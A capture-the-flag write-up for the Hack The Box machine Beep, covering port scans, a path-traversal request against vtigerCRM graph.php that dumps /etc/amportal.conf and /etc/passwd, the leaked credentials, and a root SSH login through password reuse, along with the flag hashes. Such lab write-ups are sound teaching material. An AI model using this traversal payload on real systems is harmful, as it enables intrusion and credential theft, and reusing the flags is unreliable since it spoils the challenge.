BeepPlatform: Hack The Box
IP Address: 10.10.10.7
Difficulty: Easy Linux
Beep has a very large list of running services, which can make it a bit challenging to find the correct entry method. This machine can be overwhelming for some as there are many potential attack vectors. Luckily, there are several methods available for gaining access.
nmap -p- 10.10.10.7 --min-rate 10000
nmap 10.10.10.7 -sCV -oN nmapscan
http://10.10.10.7 initially failed → forced TLS 1.0 allowed the page to load (Elastix login).dirsearch -u http://beep.htb
/mailman/listinfo → exposed Mailman group mismatch.Found public exploit: https://www.exploit-db.com/exploits/37637 → LFI via vtigerCRM graph.php
Tested:
https://beep.htb/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
✅ Dumped /etc/amportal.conf → DB creds + manager creds:
AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
Then verified wider LFI:
https://beep.htb/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action
✅ Dumped /etc/passwd → confirmed users:
asteriskfanisrootssh -oHostKeyAlgorithms=+ssh-rsa -oKexAlgorithms=+diffie-hellman-group14-sha1 root@beep.htb
✅ Root password was reused: jEhdIekWmdjE
[root@beep ~]# cat root.txt
083a385faea1a955f2550020bfd4ccc0
User flag:
[root@beep ~]# cat /home/fanis/user.txt
3196a67aeb4ad47494efdff2a8fe1aed
ssh -oHostKeyAlgorithms=+ssh-rsa -oKexAlgorithms=+diffie-hellman-group14-sha1 user@target
Writeup by inksec
GitHub: https://github.com/inkedqt
- Beep: Nmap → LFI in vtigerCRM → /etc/amportal.conf loot → SSH legacy algorithms → Root via re-used password